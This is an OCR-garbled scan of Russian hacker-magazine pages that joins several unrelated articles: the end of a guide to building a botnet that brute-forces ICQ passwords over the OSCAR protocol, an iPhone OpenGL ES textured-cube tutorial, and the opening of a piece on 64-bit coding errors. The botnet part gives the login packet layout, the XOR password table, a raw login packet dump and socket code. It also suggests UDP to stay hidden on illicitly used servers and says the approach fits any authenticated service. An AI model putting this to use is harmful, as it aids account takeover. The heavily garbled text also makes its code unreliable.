сти» — как в матрешке, начиная с самой маленькой: 
ИѴ — Туре, І_епд1:И, Ѵаіие — название говорит само за 
себя. Состоит из 0x02 + 0x02 + ВІ_ОВ байт. В первых 
двух байтах указывается тип пакета, во вторых двух — 
длина (иіпііб), далее идет содержимое пакета. 

5ЫАС — 5 ітріе Ыеіѵѵогк Аіотіс Соттипісаііоп, состо- 
ит из [атііу — «семейства», Іуре — идентификатора 
в «семействе», флагов, гециез1;ІсІ (последние два 
используются редко, обычно выставлены в 0x00) и, 
собственно, данных. 

РЬАР — самый «главный» тип данных, без него не 
обходится ни один пакет. ЕІ_АР состоит из первого 
байта, всегда равного 0x2а, канала (0x01 — установка 
соединения, 0x02 — канала данных, 0x03 — кана- 
ла ошибок (практически не используется), 0x04 — 
закрытие соединения, 0x05 — «пинг» (КеерАІіѵе)). 
Далее следуют два байта «зедиепсе» — порядковый 
номер пакета, он увеличивается с каждым пакетом. 
Следующие два байта — длина содержимого, ну и, 
наконец, само содержимое. 

Первый пакет, который мы должны отправить — СІ_І_ 
ЮЕКІТ: 



ТЬѴ 0x0001 — ТОШ в виде строки 
ТЬѴ 0x0002 — Пароль в «шифрованном» виде — 
каждый байт пароля ХОК'ится соответствующим 
байтом из набора " \хі3\х26\х81\хс4\х39\х86\ 
хбЪ\х92 \х71\хаЗ \хЬ9\хеб\х53 \х7а\х95\х7с" 

ТЬѴ 0x0003 — СІіепбІБ — имя клиента, стро- 
ка. «ІСО Сііепб» либо «АІМ» 

ТЬѴ 0x0016 — два байта, номер версии кли- 
ента до первой точки 

ТЬѴ 0x0017, 0x0018, 0x0019, ОхООІА, 0x0014 

— части версии клиента, по два байта 
ТЬѴ 0x0 0 0Е, 0x0 0 0Р — страна и язык клиен- 

та соответственно. Строки («из», «еп» или 
«ги» , «ги», к примеру) 

Практика 

Покаюсь — на практике из описанного реализова- 
но пока далеко не все (в связи с катастрофической 
нехваткой времени), поэтому статья достаточно 
абстрактна, однако, даже если бы проект был полно- 
стью готов, исходников прибавилось бы немного — это 
же коммерческая тайна! 

Коннектиться к серверу мы будем по протоколу ТОР 
(как к серверу с брутфорсом, так и к серверу I СО) . Для 
этого я написал небольшой класс, реализация кото- 
рого абсолютно тривиальна, поэтому я покажу тебе 
только его объявление: 

сіазз Зоскеб { 
риЫіс : 

Ъооі соппесбТоНозб ( 

сопзб сЪаг *ЪозбЬате, 
іпб рогб) ; 



Ъооі зепбБаба ( 

сопзб сЪаг *Ъиіі, 
іпб ІепдбЪ) ; 

Ъооі гесеіѵеЬаЬа( 
с лаг *Ъиіі , 
іпб ІепдбЪ) ; 
іпб ЪубезАѵаіІаЫе ( ) ; 
ѵоіб бізсоппесбРготНозб ( ) 
{ 

сіозезоскеб (зоск) ; 





НТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

озсаг.азесЬка.ги — 

документация 05САР 
на русском языке. 




} 

ргіѵабе : 

ЗОСКЕТ зоск; 

} ; 




Один и тот же класс будет использоваться для двух 

_ > ѵѵагпіпа 

объектов -со кето в. Сначала нужно приконнектиться к 

данному нам ІСО-серверу и проверить, является ли он Информация предо- 
ІСО-сервером: ставлена исключи- 

тельно в ознакоми- 

і 1 ( ! зоск . соппесЬТоНозЬ ( " Іодіп . ісд . сот" , тельных целях. 



5190) ) 



гебигп Іаізе; 



сЪаг Ъи 11 [16] ; 
шешзеЬ(Ъи11, 0, 16); 
зоск . гесеіѵеЬаЬа (Ъиіі , 10); 

іі ( Ъи 1 1 [ 0 ] ! = 0х2А ) 

{ 

зоск . ЪізсоппесЬРгошНозЬ ( ) ; 
геЬигп Іаізе; 

} 

геЬигп Ьгие; 

Далее, если все нормально, коннектимся к брутфорсу 
и проверяем, а брутфорс ли это? 



іі ( ! зоск. соппесЬТоНозЬ (" іодіп. ісд. сот" , 

5190) ) 

гебигп іаізе; 

іі ( ! ЪгиЬеЗоск . зепбЬаЬа ( 

" \хЬ\хЕ\хА\хЬ\хВ\хЕ\хЕ\хР" , 8) ) 

{ 

ЪгиЬеЗоск . ЪізсоппесЬРготНозЬ ( ) ; 
геЬигп іаізе; 

} 

сЪаг баба [ 8 ] ; 

іі ( ! ЪгиіеЗоск. гесеіѵеБаіа (баба, 8) I I 
тетстр(баба, " \хР\хЕ\хЕ\хВ\хЬ\хА\хЕ\хВ" , 8)) 
{ 

ЪгибеЗоск . бізсоппесбРготНозб ( ) ; 
гебигп іаізе; 

} 

гебигп бгие ; 




Если тут тоже все идет нормально — получаем II I N и 
пароль от сервера и пытаемся залогиниться. 

тетзеб (иіп , 0x00, ЫЫ_ЬЕШТН) ; 

тетзеб (разз , 0x00, РА38_ЬЕЫСТН) ; 

/* Кесеіѵе иіп & разз */ 

ЪгибеЗоск. гесеіѵеБаба (иіп, 9); 
ЪгибеЗоск . гесеіѵеБаба (разз , 8); 
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Чтобы не собирать пакет СІ_І_ЮЕІ\ІТ вручную, я собираю его из 
кусков, полученных с помощью ІСОМепасе — все части пакета, 
кроме 1)1 N и РаззѵѵогсІ, статичны и одинаковы при любом рас- 
кладе. 

Вот тебе полный дамп, «перегнанный» в С-зІуІе массив байт — а 
со сборкой пакета разбирайся сам :). Не буду раскрывать все 
карты, тем более тут уже указано, что и где должно быть: 

сопзБ сЬаг ІодіпБаБа [ ] = " \х00\х1с\хБ0\х21\хсБ 

\х4а\х00\х1Б\хс6\хЪс!\х83\хс1с\х08\х00\х45\х00 " 

" \х0 0\х87 \хЗа\хс!4 \х40\х00 \х80\х06 \хес\х16\х0а 
\х9 6\х0 0\х08\хссЗ\хЬс" 

" \хБЪ \х2Ъ\хО 7 \х4 8 \х1 4 \х4 6 \ха 6 \хскі\х2 0 \х4с\ха5 
\х9е\х57\ха1\х50\х18 " 

" \хББ\хБ5 \х64 \хс!3 \х0 0\х0 0 \х2а\х01\х5 0\х31\х0 0 
\х59\х00\х00\х00\х01" 

"\х0 0\х01\х0 0%сі%зх0 0\х02\х0 0%(а" 
"%з\х00\х03\х00\х0а\х49\х43\х51\х20\х43\х6с 
\хб9 " 

" \х65\х6е\х74\х00\х16\х00\х02\х01\х0а\х00\х17 
\х00\х02\х00\х06\х00" 

п \х18\х00\х02\х00\х05\х00\х19\х00\х02\х00\х00 
\х00\х1а\х00\х02 \х00 " 

" \хб8\х00 \х14 \х0 0\х04\х00\х00\х75\х37\х00\х0Б 
\х00\х02\х65\х6е\х00" 

"\х0е\х00\х02\х75\х73" ; 




ІСОМепасе ѵ0.9 



ІБ ( зоскеБ == ШЬЬ ) { 

/ / ЗЪаіБап ! ! 1111 
геБигп; 

} 

зоскеБ ->шгіБе (ОВуБеАггау : : БготНех ( "БЕАБВЕЕЕ" ) ; 
зоскеБ - >ѵ7аіБЕогКеас!уКеас1 ( ) ; 

ІБ ( зоскеБ->геасІАІ1 ( ) != <2ВуБ еАг г ау :: БготНех ( 

" РЕЕВБАЕБ" ) ) 

// Еггог 
еізе 

// зиссезз 

зоскеБ->с1ізсоппесБЕготНозБ ( ) ; 
зоскеБ-^маіБЕогБізсоппесБесІ ( ) ; 

ЦеІеБе зоскеБ; 

Идем дальше. Эта функция: 



Далее мы получаем данные от ІСО-сервера, сверяемся, подошел 
пароль или нет, и отправляем ответ серверу, к примеру, 0 — подо- 
шел, 1 — не подошел, 2 — ошибка. 

Брутфорс 

Пришло время писать серверную часть брутфорса на О!. В 01 есть 
класс для создания ТСР-сервера — ОТсрЭегѵег. Посмотрим, какие 
методы нам от него потребуются: 

Ъооі ІізБеп ( 

сопзБ ОНозБАсІсІгезз & асЗсЗгезз = ОНозБАсІсІгезз : : Апу , 
диіпБІброгБ = 0) 

Запускает прослушивание заданного порта на задан- 
ном интерфейсе. Советую оставлять интерфейс дефолтным 
(ОНозіАсИгеззсАпу) во избежание проблем с подключением. 

Когда к серверу присоединяется клиент, объект генерирует сиг- 
нал: 

ѵоіЪ ОТсрЗегѵег : : петлгСоппесБіоп () [зідпаі] 

Как только мы «поймаем» этот сигнал, мы можем «взять» сокет из 
очереди с подключенным к нему клиентом с помощью метода 

ОТсрЗоскеБ * ОТсрЗегѵег : : пехБРепсііпдСоппесБіоп () 

Если в данный момент активных соединений нет, то функция 
вернет нулевой указатель. Далее от нас требуется просто писать в 
сокет данные и читать их (поочередно), например, так: 

ОБсрЗоскеБ *зоскеБ = зегѵег-> 
пехБРепсІіпдСоппесБіоп ( ) ; 



Ъооі ОАЪзБгасБЗоскеБ : : маіБЕогКеасІуКеасІ ( 
іпБ шзесз = 30000 ) 

позволяет создавать приложения с использованием сокетов 
в блокирующем режиме — она возвращает управление толь- 
ко после того, как на сокете появятся данные, либо истечет 
время, равное пгізесз (в миллисекундах). Также, если мы хотим 
сделать все красиво и правильно, нужно дождаться отклю- 
чения сокета до его удаления, то есть вызвать блокирующий 
метод ѵѵаііЕогОізсоппесІесіП, и только после этого удалять 
объект. 

Также не забудь подключить модуль ОіЫеІѵѵогк в файле .рго. 
Делается это так: 

ОТ += пеБтлгогк 

Заключение 

Ну вот, основы я тебе объяснил, дальше дерзай сам! Что тебе 
осталось сделать? 

1. Собрать пакет СІ_І_ЮЕІ\ІТ; 

2 . Принять и проанализировать ответ; 

3. Написать сервер-брутфорс — рутинная работа, про которую 
писали уже не раз, и справиться с которой может любой школьник. 
Кстати, ответ от ІСО-сервера в любом случае приходит по четвер- 
тому каналу (С0І\ІІ\ІЕСТІ0І\І_СІ_05Е). Кроме того, могу посоветовать 
использовать ІЧОР-сокеты для связи бота с сервером-брутфорсом 
— отправка таких пакетов менее палевна из-за отсутствия лишних 
соединений (это пригодится в случае, если ты надумаешь брутить 
на не совсем легальном дедике :)). С этим тебе поможет класс 
ОШрЭоскеЕ Само собой, брутить таким способом можно не только 
ІСО-номера; такой ботнет можно адаптировать для любого сервиса 
с авторизацией, □с 
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ОДНУ МЫСЛЬ ... 



30 СЕНТЯБРЯ 

СТАРТУЕТ НОВЫЙ МУЖСКОЙ ТЕЛЕКАНАЛ 









о Когда речь заходит о программировании графики под іРНопе, люди 
сразу представляют ШКіГы, Соге бгарЫсз'ы и прочие красоты Сосоа 
ТоисІі, отягощенные Оіцесііѵе-С интерфейсом. Все это пестрое 
разнообразие, слабо известное за пределами Мае 08 X, энтузиазма не 
вселяет. Меж тем все как-то забыли про ОрепбІ- Е$, программирование 
под который почти не отличается от такового под «большой» ОрепбІ 
и сильно облегчает жизнь. 



Необходимый инструментарий 

Прежде всего нам придется смириться с тем, что ребята из Арріе 
устроили большую подставу, выпустив ІРЬопе 5йК только под 
Мае 05 X. Учитывая то, что в основе этого продукта лежат ѲСС- 
кросскомпиляторы для АРМ ѵб и І_І_ѴМ, это вдвойне странно. Но 
делать нечего, и из этого следует, что первое, что нам понадо- 
бится — это Мае 05 X. Не надо сразу посыпать голову пеплом и 
бежать за макбуком в ближайший магазин, все не так плохо. К 
счастью, на свете не первый год существует инициатива 05X86, 
задачами которой является установка Мае 05 X на обычные РС 
(с разной долей успеха) и превращение их в так называемые 
«ЬаскіпІозЬ’и». Решение это вполне жизнеспособно, я, к примеру, 
активно использую его на ноутбуке, у которого в процессоре даже 
нет 55ЕЗ, благо ядро ХІМІІ/ѴоосІоо позволяет решать даже такие 
проблемы. 

Следующее, что нам понадобится, — это хСобе — по сути, ІОЕ в 
виде фронтэнда для ОСС. Лучше качать его сразу с интегрирован- 
ным ІРЬопе 5йК, в таком виде его раздают на сайте Арріе после 
бесплатной регистрации (надо принять во внимание, что они потом 
будут тебя спамить, так что рабочий адрес лучше не указывать). 
Если кто-то переживает насчет покупки сертификатов разработчи- 
ка, спешу успокоить — для наших целей вполне хватит симулятора, 
если нет возможности заливать собранное приложение на настоя- 
щую железку — это совсем не страшно. 



Генерируем шаблон 

СІЕь-приложения 

Итак, обладатели хакинтошей отплясали с бубнами, хСобе запу- 
стился, и мы, наконец, приступаем. Воспользуемся тем, что 
ЮЕ умеет генерить различные шаблоны, в том числе и 6І_Е5- 
приложений, — это избавит нас от некоторого объема рутинной 
работы. Создаем Рго)есІ Ыеѵѵ Рго)есІ -> ІРЬопе 05 Арріісаііоп 
-> ОрепѲІ_ Е5 Арріісаііоп СЬоозе и получаем простенькое рабо- 
чее приложение, демонстрирующее нам квадратике градиентной 
заливкой. 

Здесь наблюдаются даже зачатки архитектуры с выделен- 
ным рендерером. В принципе, кроме метода гепбег одного 
из Е5Репбегег’ов, на практике нас ничего не интересует, но 
все же предлагаю быстро просмотреть иерархию созданного 
проекта. Управление основным приложением располагается 
в интерфейсе Аррйеіедаіе, здесь живут обработчики запуска/ 
приостановки/завершения приложения и им подобные. Тут 
же в главное окно встраивается 6І_Е5’ная вьюшка ЕА6І_Ѵіе\л/, 
создающая анимированный 0реп6І_-контекст, а также при- 
нимающая в себя тычки мышкой... простите, пальцами. 
Непосредственно алгоритмы отображения графики вынесены 
в интерфейс Е5Репбегег, в котором мы и будем вести раз- 
работку. Я, как мог, попытался изобразить описанное на диа- 
грамме. 
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Архитектура приложения 

Модификация шаблона 

Теперь настала пора причесать проект для удобства 
дальнейшей разработки. Сначала я удалил абстрактный 
интерфейс ЕЗРепсІегег.Ь, реализацию Е52РепсІегег.т/Ь 
и папку ЗЬасІегБ, ибо нам сейчас все эти навороты 
без надобности. Е51 Репбегег я сделал наследником 
ЫЗО^есТ так как интерфейса ЕЗРепсІегег больше не 
стало. В методе ЕАОЬѴіе\л/::іпііѴѴііЬСосІег я также оставил 
только один рендерер безо всяких выкрутасов : гепбегег 
= [[Е51 Репбегег аііос] ГпіЙ. 

Мусор мы подчистили, но это не все. Не знаю, кто как, а 
лично я не в восторге от ОЬіесбѵе-С и постоянно испы- 
тываю желание написать класс-другой на С++. К сча- 
стью, это вполне возможно. 

Переименуем всем нашим файлам расширение .т в 
.тт — это позволит нам микшировать код на О^есііѵе-С 
и С++ без ограничений, чем мы тут же и займемся — 
добавим в проект файлы СиЬе.тт и СиЬе.Ь и реализуем 
в них безумно сложный СИНГЛТОН: 

сіазз СЬСиЬе { 
риЫіс : 

зЬаЬіс СЬСиЬе * деЫпзЬапсе ( ) ; 
зЬаЬіс ѵоіЬ ЬезЬгоуІпзЬапсе ( ) ; 
ѵоісі гепЬег ( ) ; 

ргіѵаЬе : 

СЬСиЬе ( ) ; 

-СЬСиЬе ( ) ; 

зЬаЬіс СЬСиЬе *_іпЬегпа1_іпзЬапсе; 

} ; 



Теперь примемся за Е31 Репбегептепбег. 

Системные тонкости вроде биндинга фреймбуфе- 
ров там уже сгенерены до нас, и трогать это мы не 
будем. Уберем исходную инициализацию ОрепбЬ- 
окружения, которая там прописана, и впишем нор- 
мальную, ЗО'шную, с 2-бефером и прочими радостя- 
ми. Я сделал проекцию 60-градусного поля зрения 
через дІЕгизІитІ 1 : 



- ■ » 9»Ш 




дІМаЬгіхМоЬе (СЬ_РКОЦЕСТІОЫ) ; 
дІЕпаЫе (СЬ_ЬЕРТН_ТЕЗТ) ; 
дІЕпаЫе (СЬ_СЬЬЬ_ЕАСЕ) ; 
дІЕгизЬитР (...); 
дІѴіеѵтрогЬ ( 0 , 0, ЬаскіпдШіЬЬЬ, 

ЬаскіпдНеідЬЬ ) ; 

Теперь уберем алгоритмы рисования разноцветного ква- 
драта и прикрутим наш будущий С++’ный куб: 

СЬСиЬе : : деЫпзЬапсе ( ) ->гепЬег ( ) ; 

После вышеозначенных действий, если все было проде- 
лано правильно, наше хозяйство должно собираться. 

Кубик 

Вот и настала пора писать непосредственно алгоритм 
отрисовки нашего кубика. Основное отличие от класси- 
ческого подхода состоит в том, что в Е5 не используются 
блоки вида дІВедіп/дІЕпсІ, содержащие повертексные 
вызовы; вместо этого необходимые данные складывают- 
ся в массивы, которые обрабатываются векторными 
вызовами, сразу по несколько вертексов за раз. Также в 
Е5 не используются примитивы сложнее треугольников 
во избежание сложностей с неплоскими полигонами. 
Итак, создаем в ОІ_СиЬе::гепсІег массив из 72 значений 
и отрисовываем его проходами по 12 (3 координаты на 4 
вертекса — одна сторона куба): 

зЬаЬіс сопзЬ СЬРІоаЬ ѵегЬз[] = {...}; 
дІСІеаг ( 

СЬ_СОЬОЕ_ВЬЕЕЕЕ_ВІТ | СЬ_БЕРТН_ВПЕЕЕВ_ВІТ) ; 
дІЬоаЫЬепЬіЬу ( ) ; 
дІТгапзІаЬеР (0.0Т # 0.0Т # -4.0Т) ; 
дІЕпаЫеСІіепЬЗЬаЬе ( СЬ_ѴЕКТЕХ_АККАУ ) ; 




[ НТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

ѵѵѵѵѵѵ.іпзапеіутас. 
сот . ѵѵѵѵѵѵ.аррІеШ'е. 
ги. ѵѵѵѵѵѵ.рго]ес1:о5х. 

сот — крупнейшие 
ресурсы касательно 
хакинтошных вопро- 
сов. 

сіеѵеіорег.арріе.сот/ 
ірбопе — точка старта 
для поиска инстру- 
ментария и онлайн- 
документации. 




> ѵѵагпіпд 

Понимание основ 
в разработке графи- 
ческих приложений 
— востребован- 
ное качество для 
АррЗіоге- издателя, 
который будет брать 
тебя на работу. 



Рог ( з і 2 е Ь і = 0; і<6; + + і) 

{ 

дІѴегЬехРоіпЬег (3 , СЬ_ЕЬОАТ, 0, ѵегЬз+і*12); 
дІЬгамАггауз ( СЬ_ТКІАЖТЬЕ_ЕАРІ , 0, 4); 



После этого должны появится очертания нашего кубика. 

Да будет свет 

Если честно, полученный в предыдущем шаге результат 
не особо впечатляет. Но его можно достаточно легко 
украсить, используя освещение. Делается это так же, 
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как и в «большом» ОрепѲІ_. Идем в Е51 РепсІегег::гепсІег и в том 
месте, где происходит инициализация 0реп6І_-окружения, при- 
кручиваем источник света. Для начала разрешаем освещение и 
добавляем одну лампочку: 



дІЕпаЫе (СЬ_ЫСНТІЫС) ; 
дІЕпаЫе (СЬ_ЫСНТ0) ; 




Создаем новое приложение 



Теперь зададим свойства освещаемого материала со всеми бле- 
стючестями и прочими красотами (инициализацию массивов я 
опустил для упрощения): 

д ІМаВегі а 1 і ѵ ( СЬ_ЕКСЖТ_АШ_ВАСК , 

СЬ_АМВІЕЫТ / шаЦАшЬіепЕ) ; 
дІМаВегіаііѵ ( СЬ_ЕК(ЖТ_АШ_ВАСК , 

СЬ_ВІЕРВЗЕ, таВВіііизе) ; 
д ІМаВегі а 1 і ѵ ( СЬ_ЕКСЖТ_АШ_ВАСК , 

СЬ_8РЕСІЛА.К , таВЗресиІаг) ; 
дІМакегіаІі ( СЬ_ЕВСЖТ_АШ_ВАСК , 

СЬ_ЗНШШЕЗЗ, ІідкВЗкіпіпезз) ; 

Разместим и сконфигурируем лампочку: 

діЬідІіВіѵ (СЬ_ЫСНТ0 , СЬ_АМВІЕВТ, ІідкВАтЪіепВ ) ; 
дІЬідЫ:іѵ (СЬ_ЫСНТ0 , СЬ_ВІРЕВЗЕ, ІідкВВіііизе) ; 
дІЬідЬВіѵ (СЬ_ЫСНТ0 , ОЬ_РОЗІТІ(Ш, ІідкВРозіВіоп) ; 

И не забудем, что грани нашего куба должны быть четко видны, а 
не сглажены: 

дІЗЛасІеМосІеІ (СЕ_РЬАТ) ; 

Результатом проделанных немудреных действий станет то, что 
наш кубик приобретет ощутимый объем. 

Текстуры 

Несмотря на приобретенный объем, куб все равно выглядит 
скучновато. Появляется желание его разрисовать. В 0реп6І_ это 
принято делать посредством текстур. Текстуры принято хранить в 
картинках. Картинки будут жить в ресурсах приложения, а загру- 
жать их мы будем с помощью класса ІШтаде из іРЬопе БйК. Я 
взял логотип небезызвестного журнала, привел его к размеру 
256x256 (размерность в степенях двойки — необходимое условие 
для 0 реп 6 1_ -текстур) и добавил в проект. Наш класс 6І_СиЬе рас- 
ширился методом 6І_СиЬе::ІоасІТехІиге(соп5І сбаг *1ех_пате), в 
котором мы разберем наиболее интересные моменты. 

Для начала нам необходимо загрузить картинку из ресурсов в 
ІЛІтаде, это потребует некоторых манипуляций с ее именем: 

ВЗЗВгіпд* пзТехБате = [ [ЫЗВипсПе таіпВипсІІе] 

раВЬЕогКезоигсе : [ВЗЗВгіпд зВгіпдМВШТЕ83Вгіпд : 

Вех_паше] оіТуре : піі ] ; 

ІЛІтаде* иіітаде = [ІЛІтаде ітадеѴЛВкСопВепВзОіЕіІе : 



пзТехБате] ; 

ССІтадеКеЕ зргіВеІтаде = иіітаде . ССІтаде ; 

На данном этапе мы впервые встретились с функциями СО* из 
семейства СогеОгарЫсз. Поскольку СогеОгарЫсз Ргаппеѵѵогк не 
включен в наш проект по умолчанию, необходимо сделать это 
самостоятельно, иначе ничего не соберется. Данный фреймворк 
поставляется вместе с іРЬопе БйК, просто нужно добавить его в 
папочку Ргатеѵѵогкз в проекте. 

Далее необходимо подготовить буфер, из которого мы потом 
сформируем текстуру. В моей картинке используется ВСВА- 
модель, по байту на компонент, поэтому я умножаю размерность 
на 4: 

іпЬ Вех_ѵЛсЩЬ. = ССІтадеСеШісІВЦ ( зргіВеІтаде) ; 
іпЬ Вех_ЦеідЫ: = ССІтадеСеВНеідЫ: ( зргіВеІтаде) ; 
СЬиЪуВе *зргіВеВаВа = (СЬиЪуВе *) таііос ( Вех_ѵЛсЩЬ. * 
Вех_Ъ.еідіШ * 4); 

Теперь переходим к заключительной части шаманства. Смысл 
нижеприведенного кода заключается в том, что мы создаем из 
подготовленного ранее буфера графический контекст, а потом 
рисуем загруженную из ресурсов в ІЛІтаде картинку на этом кон- 
тексте. Таким образом, картинка попадает в наш буфер: 

СССопВехВКеі зргіВеСопВехВ = ССВіВтарСопВехВСгеаВе ( з 
ргіВеВаВа, Вех_ѵЛс1 Ыл, Вех_Цеід1іВ , 8, Вех_ѵЛсЩ]і * 4, 
ССІтадеСеВСоІогЗрасе ( зргіВеІтаде) , кССІтадеАІркаРгет 
иІВірІіесЩазВ ) ; 

ТЛСгарМсзРизкСопВехВ ( зргіВеСопВехВ ) ; 

[иіітаде сІгахЛпКесВ : ССКесВМаке ( 0 , 0, Вех_ѵЛсІВЪ., 

Вех_Ъ.еідіШ) ] ; 

ІЛСгарМсзРорСопкехЦ ( ) ; 

СССопВехВКеІеазе ( зргіВеСопВехВ ) ; 

После этого мы формируем из буфера зргіІеОаІа 0 ре пѲІ_ -текстуру 
абсолютно стандартным методом и помещаем ее идентификатор в 
атрибут Ѳ Юи Ье : :іех_ісІ для дальнейшего использования. 

Теперь настало время использовать загруженную текстуру. Для 
начала идем в Е81 Репбегег-гепсіег и разрешаем текстуры в ини- 
циализации 0реп6І_-окружения: 

дІЕпаЫе (СЬ_ТЕХТ1ШЕ_2В) ; 

Текстурные координаты передаются в конвейер тоже векторными 
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вызовами, мы будем отдавать пачками по восемь (две координаты на 
четыре вертекса]. Дополним метод 6І_СиЬе::гепсІег: 

збабіс сопзб Сббіоаб бехСоогсіз [ ] = {...}; 



дІВіпсІТехбиге ( СЬ_ТЕХТІЖЕ_2 Б , бех_і(1) ; 
дІЕпаЫеСІіепбЗбабе ( СЬ_ТЕХТШЕ_СООКБ_АККАУ ) ; 

дІТехСоогсІРоіпбег (2 , СЬ_ЕЬОАТ, 0, бехСоогсіз + і*8) ; 

И получаем в награду за наши труды изумительной красоты текстури- 
рованный кубик! 

Интерактив 

Мне кажется, с накручиванием графической составляющей уже пора 
остановиться, пока мы не переплюнули движок ісі ІесЬ 4. Статичный 
кубик наводил на меня уныние, и я решил, что раз у нас есть устрой- 
ство с сенсорным экраном, то должна быть возможность крутить кубик 
пальцами. И без промедления я начал с добавления в класс 6І_СиЬе 
углов поворота апд_х и апд_у, завернутых в акцессор іпсгетепіАпдІез. 
В том же классе, в методе гепбег, эти углы были использованы: 

дІКобабеб (апд_х, 0.06, 1.0:6, 0.06); 

дІКобабеб (апд_у , 1.06, 0.06, 0.06); 

Теперь осталось только прикрутить отслеживание тычков пальцами. 
Они приходят к наследнику ІІІѴіеѵѵ, в нашем случае это интерфейс 
ЕА6І_Ѵіеѵѵ, так что мы идем в ЕАѲІ_Ѵіе\л/.тт и начинаем реализовы- 
вать там необходимые методы. 

Прикосновение к экрану — запоминаем последний палец из мульти- 
тача как начальную позицию: 

- (ѵоісі) боисЬезВедап: (ЫЗЗеб* ) боисЬез 
тбііЕѵепб : (ІНЕѵепб* ) еѵепб { 

бог (ІЛТоисЪ. *боисЪ. іп боисЬез) { 

1азб_боис1і_х = [боисЬ. ІосабіопІпѴіехѵ: зеіб] .х; 
1азб_боис1і_у = [боисЬ ІосабіопІпѴіеѵ?: зеіб] .у; 

} 

} 

Сдвиг пальца необходимо транслировать в углы поворота нашего 
куба, а после запомнить как начальную позицию для следующего 
сдвига: 



- ( ѵоісі) боисЬезМоѵес! : (ЫЗЗеб* ) боисЬез 
тбЬЕѵепб : (ШЕѵепб* ) еѵепб. { 

бог (ІЛТоисЬ *боисЬ іп боисЬез) { 
іпб с!е1ба_х = 

[боисЬ ІосабіопІпѴіем: зеіб ] . х - 1азб_боисЬ_х; 
іпб с!е1ба_у = 

[боисЬ ІосабіопІпѴіем: зеіб ] .у - 1азб_боисЬ_у ; 
СЬСиЬе : : дебіпзбапсе ( ) ->іпсгешепбАпд1ез ( 

18 0 . 0 6*с1е1ба_х/32 0 . 06, 180 . 0 6*с1е1ба^/48 0 . 06) ; 
1азб_боисЬ_х = [боисЬ ІосабіопІпѴіем: зеіб] .х; 
1азб_боисЬ_у = [боисЬ ІосабіопІпѴіем: зеіб ] .у ; 

} 

} 

Отрыв пальца от экрана и его выход за границы экрана для наше- 
го алгоритма будет являться просто последним сдвигом: 

- (ѵоісі) боисЬезЕпсІесІ: (ЫЗЗеб* ) боисЬез 

мібЬЕѵепб : (ІЛ Еѵепб *) еѵепб { [зеіб 
боисЬезМоѵесІ : боисЬез мібЬЕѵепб : еѵепб ] ; } 

- (ѵоісі) боисЬезСапсеІІесІ: (ЫЗЗеб*) 

боисЬез мібЬЕѵепб : (ІЛ Еѵепб *) еѵепб { [зеіб 
боисЬезМоѵесІ: боисЬез мібЬЕѵепб : еѵепб ] ; } 

Теперь работа закончена — реализуя все описанное в этой статье, 
ты сможешь развлекать себя долгими зимними вечерами, крутя 
кубик на экране любимого іРИопе. 

Тір$ & Ггіскз 

Чтобы наше творение не выглядело как наколенная поделка, я 
считаю, ему необходимо придать лоск. 

1. Создаем файл ОеІЬиЬ.рпд размером 320x480 и добавляем его 
в корень проекта. Теперь картинка из этого файла будет служить 
Бріазб-зсгееп'ом, пока приложение стартует; 

2. Создаем файл Ісоп.рпд размером 57x57 и добавляем его в 
ресурсы проекта. Находим в папке Резоигсез манифест с расши- 
рением *.рІІ5І, выбираем, в поле « I с о п біе» вписываем Ісоп.рпд. 
Теперь у нашего приложения есть достойная иконка; 

3. Добавляем в тот же манифест строку с названием «Зіаіиз Ьаг із 
іпібаііу ЫсИеп» и ставим галку напротив. Теперь наше приложе- 
ние будет полноэкранным. 

Вот и все. Кодинг окончен! Запускай и развлекайся. ц-е 
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О Прогресс идет семимильными шагами. Технологии развиваются, и вместе с ними меняется 
наша жизнь. Еще совсем недавно 2 Гб оперативной памяти считалось верхом производительно- 
сти. Но вот наступила эра 64-битных процессоров, и возможности современных ПК расширились 
в сотни раз. Но чтобы раскрыть весь потенциал новой архитектуры, нужны правильные програм- 
мисты. Сегодня мы узнаем об основных ошибках, с которыми может столкнуться простой 32-бит- 
ный кодер в новых системах. 



ДЛЯ НАЧАЛА ДАВАЙ ОПРЕДЕЛИМСЯ. ЧТО ЖЕ ТАКОЕ ЭТА ЗАГА- 
ДОЧНАЯ 64-БИТНОСТЬ. Существуют две наиболее известные 
64-битные архитектуры — это ІА64 и Іпіеі 64 (или АМ064/х86-64/ 
х64). Первая является совместной разработкой Іпіеі и НеѵѵІеИ 
РаскагсІ и реализована в микропроцессорах Ііапіит и Ііапіит 
2. Вторая же представляет собой расширение архитектуры х86 с 
полной обратной совместимостью. Благодаря этой совместимости 
х86-64 пользуется большей популярностью, чем ІА64. Основными 
достоинствами х64 являются 64-битное адресное пространство, 
расширенный набор регистров и набор команд, привычный для 
разработчиков, а также возможность запуска 32-битных ОС и при- 
ложений. 

Практически все современные ОС поддерживают 64 бита, а Місгозобі: 
проводила такие эксперименты еще в годы расцвета ѴѴіпсІоѵѵз ХР. 
Благодаря специальному режиму ѴѴоѴѴ64 (ѴѴіпсІоѵѵз-оп-ѴѴіпсІоѵѵз 64), 
который транслирует вызовы 32-битных приложений к ресурсам 
64-битной операционной системы, в винде могут корректно работать 
как 64-битные приложения, так и приложения, заточенные под архи- 
тектуру х86. 

Стоит немного рассказать и об адресном пространстве в Іпіеі 64, 
поскольку именно с ним связанно большинство типичных ошибок при 
переходе от 32-битного программирования к 64-битному. 

Процессоры х64 теоретически могут адресовать до 1 6 экзобайт 
памяти, но на практике это число оказывается гораздо меньше 
— 16 терабайт. Более того, в связи с маркетинговыми сооб- 
ражениями максимальный предел оперативки изменяется в 
зависимости от версии винды. Так, например ѴѴіпсІоѵѵз 7 Ноте 
Вазіс может адресовать до 8 Гб памяти, а ѴѴіпсІоѵѵз 7 ІІШтаІе — 
до 192 Гб. 

Теперь, когда мы имеем определенное представление о 64-битности, 
пора рассмотреть основные ошибки, совершаемые неопытными в х64- 
программировании кодерами. 

Виртуальные функции 

Пусть у нас есть код, который разрабатывался в Ѵізііаі Эіисііо 6. В 
этом коде мы определили класс СЗатрІеАрр, который наследует- 
ся от СѴѴіпАрр. В дочернем классе мы перекрываем функцию 
ѴѴіпНеІр, которая определена как виртуальная. Выглядит это при- 
мерно так: 



Виртуальная функция ѴѴіпНеІр 

сіазз ШіпАрр 
{ 

ѵігСиаІ ѵоісі МпНеІр (ШОКБ сТлЮаСа, ІІШТ пСтсі) ; 

} 

сіазз СЗатрІеАрр: риЫіс ШіпАрр 
{ 

